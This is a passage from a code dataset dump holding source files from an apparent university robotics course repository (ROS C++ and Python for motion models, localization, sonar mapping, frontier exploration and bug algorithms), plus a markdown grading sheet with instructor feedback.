"text": "#ifndef MOTION_MODEL_H\n#define MOTION_MODEL_H\n\n#include <random>\n\n#include \"pose.h\"\n\n/** This class represents a motion model for omnidirectional robot and could be\n * used to sample the possible pose given the starting pose and the commanded\n * robot's motion.\n *\n * The two parameters of the class is standard deviations of translational and\n * rotational components of the motion.\n *\n * The motion is decomposed into two translations along the x axis of the\n * robot (forward), and along the y axis of the robot (lateral), and one\n * rotation.\n *\n * Usage:\n *\n * @code\n * // Create motion model with 0.02 and 0.01 stddev\n * MotionModel motion_model(0.02, 0.01);\n * // Set the commanded robot's motion\n * motion_model.setMotion(0.5, 0.1, 0.1);\n * // Sample the possible pose given the starting pose\n * // Note that it could be repeated multiple times for the same starting\n * // pose of for different starting poses\n * Pose new_pose = motion_model.sample(pose);\n * @code\n *\n * */\nclass MotionModel\n{\n\npublic:\n\n MotionModel(double sigma_translation, double sigma_rotation)\n : forward_(0.0)\n , lateral_(0.0)\n , rotation_(0.0)\n , generator_(device_())\n , distribution_trans_(0, sigma_translation)\n , distribution_rot_(0, sigma_rotation)\n {\n }\n\n /** Set the commanded robot's motion. */\n void setMotion(double forward, double lateral, double rotation)\n {\n forward_ = forward;\n lateral_ = lateral;\n rotation_ = rotation;\n }\n\n /** Sample a possible pose resulting from the commanded robot's motion, if\n * the robot was in given pose. */\n Pose sample(const Pose& pose)\n {\n // Rotation of the motion\n double x_motion = forward_ * cos(-pose.theta) + lateral_ * sin(-pose.theta);\n double y_motion = -forward_ * sin(-pose.theta) + lateral_ * cos(-pose.theta);\n\n //Use forward, lateral, rotation to get desired motion delta_rot1, delta_trans, delta_rot2.(slide 25 localization 2)\n double delta_trans = sqrt(pow(x_motion, 2) + pow(y_motion, 2));\n double delta_rot1 = atan2(y_motion, x_motion);\n double delta_rot2 = rotation_ - delta_rot1;\n\n //Assign the noise distributions\n double trans_error = distribution_trans_(generator_);\n double rot1_error = distribution_rot_(generator_);\n double rot2_error = distribution_rot_(generator_);\n\n //Add noise\n double delta_trans_hat = delta_trans + trans_error;\n double delta_rot1_hat = delta_rot1 + rot1_error;\n double delta_rot2_hat = delta_rot2 + rot2_error;\n\n //Get the new pose\n Pose new_pose;\n new_pose.x = pose.x + delta_trans_hat * cos(rotation_ + delta_rot1_hat);\n new_pose.y = pose.y + delta_trans_hat * sin(rotation_ + delta_rot1_hat);\n new_pose.theta = normalizeAngle(pose.theta + delta_rot1_hat + delta_rot2_hat);\n\n return new_pose;\n }\n\nprivate:\n\n inline double normalizeAngle(double angle)\n {\n return atan2(sin(angle), cos(angle));\n }\n\n double forward_;\n double lateral_;\n double rotation_;\n std::random_device device_;\n std::mt19937 generator_;\n std::normal_distribution<double> distribution_trans_;\n std::normal_distribution<double> distribution_rot_;\n\n};\n\n#endif /* MOTION_MODEL_H */\n\n"
},
{
"alpha_fraction": 0.6427238583564758,
"alphanum_fraction": 0.6641790866851807,
"avg_line_length": 27.972972869873047,
"blob_id": "dd4813b6a4c1a7a7f5b6b35546c77ad019e72abc",
"content_id": "17c7c78040585ea069fc07373ec61d069b8f3098",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1072,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 37,
"path": "/amr_braitenberg/src/braitenberg_vehicle.cpp",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#include \"braitenberg_vehicle.h\"\n\nBraitenbergVehicle::BraitenbergVehicle()\n: type_(TYPE_A)\n, factor1_(1.0)\n, factor2_(0.0)\n{\n}\n\nBraitenbergVehicle::BraitenbergVehicle(Type type, float factor1, float factor2)\n: type_(type)\n, factor1_(factor1)\n, factor2_(factor2)\n{\n}\n\n/** Depending on the Braitenberg type, the input is mapped to the output.\n * The factor1 and factor2 are used to scale the output values. And the input values\n * are normalized by dividing them through 4, because that is the maximum input value. */\nvoid BraitenbergVehicle::computeWheelSpeeds(float left_in, float right_in, float& left_out, float& right_out)\n{\n switch (this->type_)\n {\n case TYPE_A:\n left_out = this->factor1_ * left_in;\n right_out = this->factor1_ * right_in;\n break;\n case TYPE_B:\n left_out = this->factor1_ * right_in;\n right_out = this->factor1_ * left_in;\n break;\n case TYPE_C:\n left_out = this->factor1_ * left_in + this->factor2_ * right_in;\n right_out = this->factor1_ * right_in + this->factor2_ * left_in;\n break;\n }\n}\n"
},
{
"alpha_fraction": 0.7490118741989136,
"alphanum_fraction": 0.7602108120918274,
"avg_line_length": 36.974998474121094,
"blob_id": "aba6b0dc37601fc969d258972c6786438e8ba691",
"content_id": "823aa060ffb0b3d58c3159e1e2161d5537b9fa5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1518,
"license_type": "no_license",
"max_line_length": 211,
"num_lines": 40,
"path": "/grades/20140503.md",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "Grade\n=====\n\n* Definition of test cases\n - Good coverage over intended functionality: 1.5/2\n* Testing\n - Running and documentation of tests: 0.5/1\n - Justification of implementation choices: 0.5/1\n* Repository state\n - Structure (team workflow, commit messages): 1/1\n - Code quality, API documentation and coherency: 1/1\n\n_Total:_ 4.5 points\n\nFeedback\n========\n\nPlease use the correct team member names.\n\n# Definition of test cases\n\nYour \"approach\" test is not a test, much rather it is inferred from the \"completeness\" test. In the last test (bug2) you seem to mix behaviour in test scenarios and \"implementation\". \n\nAs was described in the assignment, \"make absolutely sure that you\ntest the various solutions using the same preconditions (e.g. use the same start and goal positions,\nclearance levels, speeds, etc.). All parameters and preconditions for each test must be documented\". \n\n# Testing\n\nWe would have liked to see some data, maybe some screenshots, comparative tables, etc. Right now we have to take your word for the results to actually represent the current software status.\n\nFor omni velocity controller the results seem to point to the first solution to be better than the second one. Although e.g. the first test fails you seem to conclude that the implementation achieves all tasks. \n\n# Repository state\n\nWorkflow and commit messages are good. \n\nCode quality and documentation are excellent.\n\nThe code is compiling and successfully went through a test on the bug2 algorithm."
},
{
"alpha_fraction": 0.6552528142929077,
"alphanum_fraction": 0.6599165201187134,
"avg_line_length": 34.89427185058594,
"blob_id": "4ca29b6f0c6b67bde53a57cb2d2c627bfe1004f5",
"content_id": "800613fdc077d05f76ac69a42083b1327b4f0256",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 8148,
"license_type": "no_license",
"max_line_length": 158,
"num_lines": 227,
"path": "/amr_exploration/nodes/explorer.cpp",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#include <ros/ros.h>\n#include <ros/console.h>\n\n#include <amr_msgs/ExecutePathGoal.h>\n#include <amr_msgs/ExecutePathAction.h>\n#include <amr_msgs/ExecutePathActionResult.h>\n#include <amr_srvs/PlanPath.h>\n\n#include <amr_msgs/PathExecutionFailure.h>\n#include <amr_msgs/ExecutePathGoal.h>\n#include <amr_msgs/ExecutePathAction.h>\n\n#include <nav_msgs/Odometry.h>\n#include <geometry_msgs/Pose.h>\n#include <amr_srvs/GetNearestOccupiedPointOnBeam.h>\n#include <actionlib/client/simple_action_client.h>\n#include <actionlib/client/terminal_state.h>\n\n#include <pcl/point_types.h>\n#include <pcl_ros/point_cloud.h>\n#include <math.h>\n#include <tf/tf.h>\n#include <ros/duration.h>\n\n#include \"clustered_point_cloud_visualizer.h\"\n#include \"frontier.h\"\n\n#define mapCallback_debug false\n#define explore_debug true\n#define robot_position_debug false\n#define move_point_near_debug false\n\n#define reduction 0.1\n\nclass ExplorerNode\n{\n\npublic:\n\n ExplorerNode()\n : frontier_clusters_publisher_(\"frontier_clusters\", \"odom\")\n , world_is_explored_(false)\n , position_reported(false)\n , path_exec_(\"/path_executor/execute_path\",true)\n // , plan_nh_(\"~\")\n {\n frontier_publisher_ = nh_.advertise<Frontier::PointCloud>(\"frontier_points\", 1);\n map_subscriber_ = nh_.subscribe(\"sonar_mapper/map\", 1, &ExplorerNode::mapCallback, this);\n position_subscriber_ = nh_.subscribe(\"/odom\", 1, &ExplorerNode::robot_position_cb, this);\n\n robot_position_.position.x = 0;\n robot_position_.position.y = 0;\n path_planer_ = nh_.serviceClient<amr_srvs::PlanPath>(\"path_planner/plan_path\");\n occupancy_query_ = occupancy_nh_.serviceClient<amr_srvs::GetNearestOccupiedPointOnBeam>(\"/occupancy_query_server/get_nearest_occupied_point_on_beam\");\n\n ROS_INFO_STREAM(\"Wating for path executor...\");\n path_exec_.waitForServer();\n }\n\n void mapCallback(const nav_msgs::OccupancyGridConstPtr& msg)\n {\n Frontier frontier(msg);\n frontier_publisher_.publish(frontier.getPointCloud());\n frontier_clusters_publisher_.publish<Frontier::Point>(frontier.getClusterPointClouds());\n\n std::vector<Frontier::PointCloud::Ptr> frontier_clusters = frontier.getClusterPointClouds();\n \n Frontier::PointCloud::VectorType frontiers_center = frontier.getClusterCentroids();\n frontier_clusters_centroids_.resize(frontiers_center.size());\n\n ROS_WARN_STREAM_COND(mapCallback_debug,\"Frointer Count :\"<<frontier_clusters.size());\n int j =0;\n for(int i = 0;i < frontier_clusters.size(); i++){\n Frontier::PointCloud::Ptr cluster = frontier_clusters[i];\n if(cluster->size() > 10){\n frontier_clusters_centroids_[j] = frontiers_center[i];\n j = j +1;\n }\n }\n frontier_clusters_centroids_.resize(j);\n if(frontier_clusters_centroids_.size() > 0){\n world_is_explored_ = false;\n }else{\n world_is_explored_ = true;\n }\n ROS_INFO_STREAM_COND(mapCallback_debug,\"Eligible Frontier Count: \"<<frontier_clusters_centroids_.size());\n }\n\n void explore()\n {\n while (ros::ok() && !world_is_explored_)\n {\n bool path_planed = false;\n // do not start till you have a frontier\n if(frontier_clusters_centroids_.size() <= 0 || !position_reported){\n }else{\n // Choosing a target\n // the frontier with least distance form robot.\n int ind = 0;\n int plan_ind = 0;\n amr_srvs::PlanPath srv;\n for(int i=0; i < frontier_clusters_centroids_.size(); i++){\n Frontier::Point point = frontier_clusters_centroids_[i];\n if(!path_planed && plan_path_to(point,srv)){\n path_planed = true;\n plan_ind = i;\n }\n if(i != 0 && distance_from_robot(point) < distance_from_robot(frontier_clusters_centroids_[ind])){\n ind = i;\n }\n }\n Frontier::Point new_point;\n if(!path_planed){\n ROS_INFO_STREAM_COND(explore_debug,\"Found Nearest Frontier at index:\"<<ind<<\" at distance\"<<distance_from_robot(frontier_clusters_centroids_[ind]));\n new_point = move_point_near_robot(frontier_clusters_centroids_[ind]);\n // Planing a path to current target\n path_planed = plan_path_to(new_point,srv);\n }\n \n // Executeing the path\n amr_msgs::ExecutePathGoal goal;\n goal.skip_unreachable = true;\n ros::Duration wait_duration;\n if(path_planed){\n goal.path.poses.resize(srv.response.path.poses.size());\n goal.path.poses = srv.response.path.poses;\n wait_duration = ros::Duration(0,0);\n }else{\n goal.path.poses.resize(1);\n geometry_msgs::PoseStamped pose_s;\n pose_s.pose.position.x = new_point.x;\n pose_s.pose.position.y = new_point.y;\n pose_s.pose.orientation = robot_position_.orientation;\n goal.path.poses[0] = pose_s;\n wait_duration= ros::Duration(0,0);\n }\n path_exec_.sendGoal(goal);\n if(!path_exec_.waitForResult(wait_duration)){\n ROS_ERROR(\"Path Not Completed\");\n }\n \n // ...\n }\n ros::spinOnce();\n }\n ROS_INFO_COND(world_is_explored_, \"World is completely explored, exiting...\");\n }\n\n void robot_position_cb(const nav_msgs::Odometry& msg){\n\n robot_position_.position.x = msg.pose.pose.position.x;\n robot_position_.position.y = msg.pose.pose.position.y;\n robot_position_.orientation = msg.pose.pose.orientation;\n position_reported = true;\n ROS_INFO_STREAM_COND(robot_position_debug,\"Robot is at: (\"<<robot_position_.position.x<<\",\"<<robot_position_.position.y<<\")\");\n }\n\n Frontier::Point move_point_near_robot(Frontier::Point point){\n ROS_INFO_COND(move_point_near_debug,\"Moving Point(%2f,%2f)\",point.x,point.y);\n amr_srvs::GetNearestOccupiedPointOnBeam service;\n service.request.beams.resize(1);\n service.request.beams[0].x = point.x;\n service.request.beams[0].y = point.y;\n service.request.beams[0].theta = atan2(point.y- robot_position_.position.y,point.x- robot_position_.position.x);\n if (occupancy_query_.call(service)){\n ROS_INFO_STREAM_COND(explore_debug,\"nerest points count \"<<service.response.points.size());\n\n }else{\n ROS_ERROR(\"Failed to call service occupancy_query_server\");\n }\n Frontier::Point new_point;\n new_point.x= service.response.points[0].x;\n new_point.y= service.response.points[0].y;\n ROS_INFO_COND(move_point_near_debug,\"New Point(%2f,%2f)\",new_point.x,new_point.y);\n return new_point;\n }\n\n float distance_from_robot(Frontier::Point point){\n //Getting Robot position\n \n return sqrt(pow(robot_position_.position.x - point.x,2)+pow(robot_position_.position.y - point.y,2));\n }\n\n bool plan_path_to(Frontier::Point end_point,amr_srvs::PlanPath& srv){\n // Planing a path to current target\n srv.request.start.x = robot_position_.position.x;\n srv.request.start.y = robot_position_.position.y;\n srv.request.end.x = end_point.x;\n srv.request.end.y = end_point.y;\n ROS_INFO_STREAM_COND(explore_debug,\"Planing Path to Nearest Frontier...\");\n ROS_INFO_STREAM_COND(explore_debug,\"From: (\"<<srv.request.start.x<<\",\"<<srv.request.start.y<<\") To: (\"<<srv.request.end.x<<\",\"<<srv.request.end.y<<\")\");\n if (path_planer_.call(srv)){\n ROS_INFO_STREAM_COND(explore_debug,\"Path Planed with \"<<srv.response.path.poses.size()<<\" poses\");\n return true;\n }else{\n ROS_ERROR(\"Failed to call service plan_path\");\n return false;\n }\n }\n\nprivate:\n\n ros::NodeHandle nh_;\n ros::NodeHandle occupancy_nh_;\n\n ros::Subscriber map_subscriber_;\n ros::Publisher frontier_publisher_;\n ClusteredPointCloudVisualizer frontier_clusters_publisher_;\n\n ros::Subscriber position_subscriber_;\n ros::ServiceClient path_planer_;\n ros::ServiceClient occupancy_query_;\n actionlib::SimpleActionClient<amr_msgs::ExecutePathAction> path_exec_;\n Frontier::PointCloud::VectorType frontier_clusters_centroids_;\n bool world_is_explored_;\n bool position_reported;\n geometry_msgs::Pose robot_position_;\n\n};\n\nint main(int argc, char** argv)\n{\n ros::init(argc, argv, \"explorer\");\n ExplorerNode en;\n en.explore();\n return 0;\n}\n"
},
{
"alpha_fraction": 0.5471406579017639,
"alphanum_fraction": 0.5533230304718018,
"avg_line_length": 17.457143783569336,
"blob_id": "faf5fe3fce1cf6b9764474a1616e7865bfde1ceb",
"content_id": "7e70b966e6943ebb1adb1152a38ed89cdd8a2ec1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 647,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 35,
"path": "/amr_localization/include/pose.h",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#ifndef POSE_H\n#define POSE_H\n\n#include <iostream>\n\n/** This structure represents pose in 2d space. */\nstruct Pose\n{\n\n double x;\n double y;\n double theta;\n\n Pose() : x(0), y(0), theta(0) { }\n\n Pose(double x, double y, double theta) : x(x), y(y), theta(theta) { }\n\n Pose(const Pose& other) : x(other.x), y(other.y), theta(other.theta) { }\n\n const Pose& operator=(const Pose& other)\n {\n x = other.x;\n y = other.y;\n theta = other.theta;\n return *this;\n }\n\n friend std::ostream& operator<<(std::ostream& out, const Pose& p)\n {\n return out << \"[\" << p.x << \", \" << p.y << \", \" << p.theta << \"]\";\n }\n\n};\n\n#endif /* POSE_H */\n\n"
},
{
"alpha_fraction": 0.6146131753921509,
"alphanum_fraction": 0.6185018420219421,
"avg_line_length": 34.92647171020508,
"blob_id": "52873e9e962cb4a084791ad4b305daf67937a667",
"content_id": "8f88f3aa4c151dc71d89968b1dc6e9312f212538",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4886,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 136,
"path": "/amr_bugs/src/amr_bugs/bug_brain.py",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nPACKAGE = 'amr_bugs'\n\nimport rospy\nimport math\nimport planar\nfrom planar import Point, Vec2, EPSILON\nfrom planar.c import Line\nfrom math import degrees\n\n\nclass BugBrain:\n\n # declearing constants\n LEFT_WALLFOLLOWING = 0\n RIGHT_WALLFOLLOWING = 1\n LEFT_SIDE = -1\n RIGHT_SIDE = 1\n\n def __init__(self, goal_x, goal_y, side):\n # saving which wall following is being used.\n self.wall_side = side\n # saving goal point\n self.wp_destination = Point(goal_x, goal_y)\n # flag to check that robot has started wall following.\n self.path_started = False\n #the tolerence == planar.EPSILON at default value does not work good\n planar.set_epsilon(0.2)\n # storing distance to the destination when leaving the wall \n self.distance_when_left = 9999 # huge initial value\n pass\n \n # method to determin if the destenation is on opposit side of wall being followed.\n # @param: distance\n # signed distance from the robot to goal.\n # can be obtained by path_line.distance_to(ROBOT CURRENT POSITION).\n def is_destination_opposite_to_wall(self,distance):\n direction = math.copysign(1,distance)\n\n if(self.wall_side == self.LEFT_WALLFOLLOWING):\n if(direction == self.RIGHT_SIDE):\n return True\n else:\n return False\n else:\n if(direction == self.LEFT_SIDE):\n return True\n else:\n return False\n pass\n \n def follow_wall(self, x, y, theta):\n \"\"\"\n This function is called when the state machine enters the wallfollower\n state.\n \"\"\"\n # compute and store necessary variables\n theta = degrees(theta)\n position = Point(x,y)\n # storing distance to goal, later using it to decide when to leave the wall\n self.distance_when_left = self.wp_destination.distance_to(Point(x,y))\n\n self.ln_path = Line.from_points([position,self.wp_destination])\n # saving where it started wall following\n self.wp_wf_start = position\n pass\n \n\n def leave_wall(self, x, y, theta):\n \"\"\"\n This function is called when the state machine leaves the wallfollower\n state.\n \"\"\"\n # compute and store necessary variables\n self.path_started = False\n self.distance_when_left = self.wp_destination.distance_to(Point(x,y))\n self.wp_left_wall_at = Point(x,y)\n pass\n\n def is_goal_unreachable(self, x, y, theta):\n \"\"\"\n This function is regularly called from the wallfollower state to check\n the brain's belief about whether the goal is unreachable.\n \"\"\"\n # if the robot goes around an obstacle and\n # reaches the starting point and the destenation is still not reached then\n # the goal is unreachable.\n distance_to_path= self.ln_path.distance_to(Point(x,y))\n\n if(abs(distance_to_path) < planar.EPSILON and\n Vec2(x,y).almost_equals(self.wp_wf_start) and \n self.path_started):\n rospy.logwarn(\"UNREACHABLE POINT!\")\n return True\n\n return False\n\n def is_time_to_leave_wall(self, x, y, theta):\n \"\"\"\n This function is regularly called from the wallfollower state to check\n the brain's belief about whether it is the right time (or place) to\n leave the wall and move straight to the goal.\n \"\"\"\n\n self.current_theta = degrees(theta)\n\n self.wp_current_position = Point(x,y)\n self.current_direction = Vec2.polar(angle = self.current_theta,length = 1)\n #Robot Orientation Line.\n self.ln_current_orentation = Line(Vec2(x,y),self.current_direction)\n\n # the prependicular line to the path\n self.ln_distance = self.ln_path.perpendicular(self.wp_current_position)\n \n \n distance_to_path= self.ln_path.distance_to(Point(x,y))\n self.distance_to_path = distance_to_path\n distance_to_destination = self.ln_current_orentation.distance_to(self.wp_destination)\n if(abs(distance_to_path) > 0.5):\n self.path_started =True\n\n self.distance_to_goal = self.wp_destination.distance_to(Point(x,y))\n \"\"\"\n checking if distance to the straight path is approx. 0 and\n if destenation on the opposit side of wall then leave the path\n NOTE and TODO: works only for the circles not for complex path.\n \"\"\"\n if(abs(distance_to_path) < planar.EPSILON and \n self.distance_to_goal < self.distance_when_left and\n self.is_destination_opposite_to_wall(distance_to_destination) and \n self.path_started): # is robot started following wall!\n self.wp_wf_stop = Point(x,y)\n return True\n\n return False\n"
},
{
"alpha_fraction": 0.68217933177948,
"alphanum_fraction": 0.6836927533149719,
"avg_line_length": 29.720930099487305,
"blob_id": "13a5837bb044a6797f6542f701f959dc2e052de2",
"content_id": "457d4ba1183ffa8779fc485221b74348d154d235",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2643,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 86,
"path": "/amr_localization/include/random_particle_generator.h",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#ifndef RANDOM_PARTICLE_GENERATOR_H\n#define RANDOM_PARTICLE_GENERATOR_H\n\n#include <random>\n\n#include \"particle.h\"\n\n/** This class generates particles with random poses.\n *\n * By default the poses are drawn from a uniform distribution across the\n * rectangle given in the constructor. Optinally a bias towards a particular\n * pose may be introduced for a limited time (see @ref setBias()). */\nclass RandomParticleGenerator\n{\n\npublic:\n\n RandomParticleGenerator(double min_x, double max_x, double min_y, double max_y)\n : uniform_x_(min_x, max_x)\n , uniform_y_(min_y, max_y)\n , uniform_theta_(-M_PI, M_PI)\n , biased_particles_(0)\n { }\n\n /** Generate a random particle. */\n Particle generateParticle()\n {\n Particle p;\n if (biased_particles_-- > 0)\n {\n p.pose.x = normal_x_(random_generator_);\n p.pose.y = normal_y_(random_generator_);\n p.pose.theta = normal_theta_(random_generator_);\n }\n else\n {\n p.pose.x = uniform_x_(random_generator_);\n p.pose.y = uniform_y_(random_generator_);\n p.pose.theta = uniform_theta_(random_generator_);\n }\n p.weight = 0.0;\n return p;\n }\n\n /** Introduce a bias towards a certain point.\n *\n * Here by bias we mean that the poses will be drawn from a normal\n * distribution around the bias pose.\n *\n * @param pose : a pose around which random samples will be drawn.\n *\n * @param std : standard deviation (same for x, y, and theta).\n *\n * @param particle_count : number of particles for which the bias will have\n * effect. After this many particles have been produced, the generator\n * switches to the \"uniform\" mode. */\n void setBias(Pose pose, double std, int particle_count)\n {\n normal_x_ = std::normal_distribution<double>(pose.x, std);\n normal_y_ = std::normal_distribution<double>(pose.y, std);\n normal_theta_ = std::normal_distribution<double>(pose.theta, std);\n biased_particles_ = particle_count;\n }\n\nprivate:\n\n // Required for random number generation\n std::default_random_engine random_generator_;\n\n // Uniform distributions from which poses for non-biased random particles are sampled\n std::uniform_real_distribution<double> uniform_x_;\n std::uniform_real_distribution<double> uniform_y_;\n std::uniform_real_distribution<double> uniform_theta_;\n\n // Normal distributions from which poses for biased random particles are sampled\n std::normal_distribution<double> normal_x_;\n std::normal_distribution<double> normal_y_;\n std::normal_distribution<double> normal_theta_;\n\n Pose bias_pose_;\n double bias_std_;\n int biased_particles_;\n\n};\n\n#endif /* RANDOM_PARTICLE_GENERATOR_H */\n\n"
},
{
"alpha_fraction": 0.7333333492279053,
"alphanum_fraction": 0.737500011920929,
"avg_line_length": 24.236841201782227,
"blob_id": "67c61811b4eb13c1ebdd3a92caa16e78148d364a",
"content_id": "0e07f93dc9a42de3ada5c9851a4d5058b38eca13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 960,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 38,
"path": "/amr_localization/include/particle_visualizer.h",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#ifndef PARTICLE_VISUALIZER_H\n#define PARTICLE_VISUALIZER_H\n\n#include <memory>\n#include <string>\n\n#include <ros/ros.h>\n\n#include \"particle.h\"\n\n/** A helper class that visualizes sets of partiles.\n *\n * Given a vector of particles it constructs and publishes ROS marker array,\n * that could be viewed with RViz. Each particle is represented by an arrow\n * having the pose proposed by the particle and the alpha corresponding to its\n * weight. The particle with the largest weight has alpha 1.0 (i.e. completely\n * opaque), and the particle with the smallest weight has alpha 0.1 (i.e.\n * almost transparent). */\nclass ParticleVisualizer\n{\n\npublic:\n\n typedef std::unique_ptr<ParticleVisualizer> UPtr;\n\n ParticleVisualizer(const std::string& topic_name, const std::string& frame_id);\n\n void publish(const ParticleVector& particles);\n\nprivate:\n\n ros::Publisher marker_publisher_;\n\n const std::string frame_id_;\n\n};\n\n#endif /* PARTICLE_VISUALIZER_H */\n\n"
},
{
"alpha_fraction": 0.6304348111152649,
"alphanum_fraction": 0.6396781802177429,
"avg_line_length": 33.562129974365234,
"blob_id": "512901c46f819247093bf6a9ff6f00eeaeebefb7",
"content_id": "aaf84758468dfe45a985c80ef188004daa0eaf0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5842,
"license_type": "no_license",
"max_line_length": 181,
"num_lines": 169,
"path": "/amr_mapping/nodes/sonar_mapper.cpp",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#include <ros/ros.h>\n#include <ros/console.h>\n#include <nav_msgs/MapMetaData.h>\n#include <nav_msgs/OccupancyGrid.h>\n#include <amr_msgs/Ranges.h>\n#include <amr_srvs/SwitchRanger.h>\n#include <tf/transform_listener.h>\n\n#include \"sonar_map.h\"\n\nclass SonarMapperNode\n{\n\npublic:\n\n SonarMapperNode()\n : transform_listener_(ros::Duration(10))\n {\n // Read settings from the parameter server\n ros::NodeHandle pn(\"~\");\n double resolution;\n double size_x;\n double size_y;\n pn.param<std::string>(\"frame_id\", frame_id_, \"odom\");\n pn.param<double>(\"resolution\", resolution, 0.06);\n pn.param<double>(\"size_x\", size_x, 16);\n pn.param<double>(\"size_y\", size_y, 16);\n pn.param<double>(\"map_publication_period\", map_publication_period_, 3);\n // Create empty map\n map_ = SonarMap::UPtr(new SonarMap(resolution, size_x, size_y));\n // Publishers and subscribers\n map_publisher_ = pn.advertise<nav_msgs::OccupancyGrid>(\"map\", 1, true);\n map_free_publisher_ = pn.advertise<nav_msgs::OccupancyGrid>(\"map_free\", 1, true);\n map_occupied_publisher_ = pn.advertise<nav_msgs::OccupancyGrid>(\"map_occupied\", 1, true);\n sonar_subscriber_ = nh_.subscribe<amr_msgs::Ranges>(\"/sonar_pioneer\", 10, boost::bind(&SonarMapperNode::sonarCallback, this, _1));\n // Force publish (initially empty) maps\n publishMaps(true);\n }\n\n void sonarCallback(const amr_msgs::Ranges::ConstPtr& msg)\n {\n for (const auto& range : msg->ranges)\n {\n // Get sonar position in the map frame\n tf::StampedTransform transform;\n try\n {\n ros::Time time;\n std::string str;\n transform_listener_.getLatestCommonTime(frame_id_, range.header.frame_id, time, &str);\n transform_listener_.lookupTransform(frame_id_, range.header.frame_id, time, transform);\n }\n catch (tf::TransformException& ex)\n {\n ROS_WARN(\"Unable to incorporate sonar reading in the map because of unavailable transform. Reason: %s.\", ex.what());\n continue;\n }\n\n // Incorporate range reading in the map\n map_->addScan(transform.getOrigin().getX(),\n transform.getOrigin().getY(),\n tf::getYaw(transform.getRotation()),\n range.field_of_view,\n range.max_range,\n range.range,\n calculateRangeUncertainty(range.range, range.max_range));\n }\n publishMaps();\n }\n\nprivate:\n\n void publishMaps(bool force = false)\n {\n if (force || last_map_publication_ + ros::Duration(map_publication_period_) <= ros::Time::now())\n {\n // Query map properties\n int width = map_->getGridSizeX();\n int height = map_->getGridSizeY();\n double min_x = map_->getMinX();\n double min_y = map_->getMinY();\n double resolution = map_->getResolution();\n // Publish maps\n map_publisher_.publish(createOccupancyGridMessage(width, height, min_x, min_y, resolution, -1.0, 1.0, map_->getMapData()));\n map_free_publisher_.publish(createOccupancyGridMessage(width, height, min_x, min_y, resolution, 0.0, 1.0, map_->getMapFreeData()));\n map_occupied_publisher_.publish(createOccupancyGridMessage(width, height, min_x, min_y, resolution, 0.0, 1.0, map_->getMapOccupiedData()));\n last_map_publication_ = ros::Time::now();\n }\n }\n\n double calculateRangeUncertainty(double range, double max_range) const\n {\n if (range < 0.1 * max_range)\n return 0.01 * max_range;\n else if (range < 0.5 * max_range)\n return 0.1 * range;\n else\n return 0.05 * max_range;\n }\n\n nav_msgs::OccupancyGridPtr createOccupancyGridMessage(int width, int height, double origin_x, double origin_y, double resolution, double min, double max, const double* data) const\n {\n const double EPSILON = 1e-5;\n const double range = max - min;\n nav_msgs::OccupancyGridPtr grid_msg(new nav_msgs::OccupancyGrid);\n grid_msg->info.width = width;\n grid_msg->info.height = height;\n grid_msg->info.resolution = resolution;\n grid_msg->info.map_load_time = ros::Time::now();\n grid_msg->header.stamp = ros::Time::now();\n grid_msg->header.frame_id = frame_id_;\n grid_msg->info.origin.position.x = origin_x;\n grid_msg->info.origin.position.y = origin_y;\n grid_msg->data.resize(width * height);\n int i = 0;\n for (int x = 0; x < width; x++)\n for (int y = 0; y < height; y++, i++)\n {\n double d = data[x * height + y];\n if (d > max - EPSILON)\n grid_msg->data[i] = 100;\n else if (d < min + EPSILON)\n grid_msg->data[i] = 0;\n else\n grid_msg->data[i] = (d - min) / range * 100;\n }\n return grid_msg;\n }\n\n SonarMap::UPtr map_;\n std::string frame_id_;\n tf::TransformListener transform_listener_;\n double sonar_uncertainty_;\n double map_publication_period_;\n ros::Time last_map_publication_;\n\n ros::NodeHandle nh_;\n ros::Publisher map_publisher_;\n ros::Publisher map_free_publisher_;\n ros::Publisher map_occupied_publisher_;\n ros::Subscriber sonar_subscriber_;\n\n};\n\nint main(int argc, char** argv)\n{\n ros::init(argc, argv, \"sonar_mapper\");\n ros::NodeHandle nh;\n // Wait until SwitchRanger service (and hence stage node) becomes available.\n ROS_INFO(\"Waiting for the /switch_ranger service to be advertised...\");\n ros::ServiceClient switch_ranger_client = nh.serviceClient<amr_srvs::SwitchRanger>(\"/switch_ranger\");\n switch_ranger_client.waitForExistence();\n // Make sure that the pioneer sonars are available and enable them.\n amr_srvs::SwitchRanger srv;\n srv.request.name = \"sonar_pioneer\";\n srv.request.state = true;\n if (switch_ranger_client.call(srv))\n {\n ROS_INFO(\"Enabled pioneer sonars.\");\n }\n else\n {\n ROS_ERROR(\"Pioneer sonars are not available, shutting down.\");\n return 1;\n }\n SonarMapperNode smn;\n ros::spin();\n return 0;\n}\n\n"
},
{
"alpha_fraction": 0.5898815989494324,
"alphanum_fraction": 0.594187319278717,
"avg_line_length": 19.622222900390625,
"blob_id": "c786cddec35777cb7f8036ebf57cbb682b72de74",
"content_id": "4673429e24df9a9fc33173b813cd3145aca9af9f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
